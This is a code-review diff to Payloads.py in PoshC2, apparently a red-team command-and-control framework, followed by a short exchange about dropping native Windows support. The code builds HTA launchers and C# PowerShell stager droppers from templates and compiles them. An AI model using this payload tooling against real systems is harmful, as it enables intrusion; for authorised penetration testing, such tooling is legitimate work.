poshc2/server/Payloads.py

```diff
@@ -313,361 +312,308 @@ def CreateShellcode(self, name=""):
+        hta = str(hta) \
+            .replace("#REPLACEME#", basefile)
+
+        output_file = open("%s%sLauncher.hta" % (self.BaseDirectory, name), 'w')
         output_file.write(hta)
         output_file.close()
 
+
     def CreateCS(self, name=""):
-        basefile = self.CreateRawBase()
-        with open("%sSharp_Powershell_Runner.cs" % PayloadTemplatesDirectory, 'r') as f:
-            content = f.read()
-        cs = content.replace("#REPLACEME#", str(basefile))
+        self.QuickstartLog(Colours.END)
         self.QuickstartLog("CS Powershell Stager source written to: %s%sSharp_Posh_Stager.cs" % (self.BaseDirectory, name))
+
+        content = open("%sSharp_Powershell_Runner.cs" % PayloadTemplatesDirectory, 'r').read()
+        content = content.replace("#REPLACEME#", str(self.CreateRawBase()))
         filename = "%s%sSharp_Posh_Stager.cs" % (self.BaseDirectory, name)
         output_file = open(filename, 'w')
-        output_file.write(cs)
+        output_file.write(content)
         output_file.close()
-        if os.name == 'nt':
-            compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs_ps.dll %s%sSharp_Posh_Stager.cs -reference:System.Management.Automation.dll" % (self.BaseDirectory, name, self.BaseDirectory, name)
-            compileexe = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs_ps.exe %s%sSharp_Posh_Stager.cs -reference:System.Management.Automation.dll" % (self.BaseDirectory, name, self.BaseDirectory, name)
-        else:
-            compile = "mono-csc %s%sSharp_Posh_Stager.cs -out:%s%sdropper_cs_ps_v2.exe -target:exe -sdk:2 -warn:1 /reference:%sSystem.Management.Automation.dll" % (self.BaseDirectory, name, self.BaseDirectory, name, PayloadTemplatesDirectory)
-            compileexe = "mono-csc %s%sSharp_Posh_Stager.cs -out:%s%sdropper_cs_ps_v4.exe -target:exe -sdk:4 -warn:1 /reference:%sSystem.Management.Automation.dll" % (self.BaseDirectory, name, self.BaseDirectory, name, PayloadTemplatesDirectory)
-        subprocess.check_output(compile, shell=True)
+
         self.QuickstartLog("C# Powershell v2 EXE written to: %s%sdropper_cs_ps_v2.exe" % (self.BaseDirectory, name))
-        subprocess.check_output(compileexe, shell=True)
         self.QuickstartLog("C# Powershell v4 EXE written to: %s%sdropper_cs_ps_v2.exe" % (self.BaseDirectory, name))
-        with open("%sDotNet2JS.js" % PayloadTemplatesDirectory, 'r') as f:
-            dotnet = f.read()        
-        with open('%s%sPosh_v4_x64_Shellcode.b64' % (self.BaseDirectory, name), 'rb') as f:
-            v4_64 = f.read()
-        with open('%s%sPosh_v4_x86_Shellcode.b64' % (self.BaseDirectory, name), 'rb') as f:
-            v4_86 = f.read()
-        dotnet = dotnet.replace("#REPLACEME32#", v4_86.decode('utf-8'))  
-        dotnet = dotnet.replace("#REPLACEME64#", v4_64.decode('utf-8'))        
+
+        if os.name == 'nt':
```

Comment:
I don't think we actually need this anymore as we don't support running natively on Windows - only using Docker

Reply:
Yeah that's a good point actually!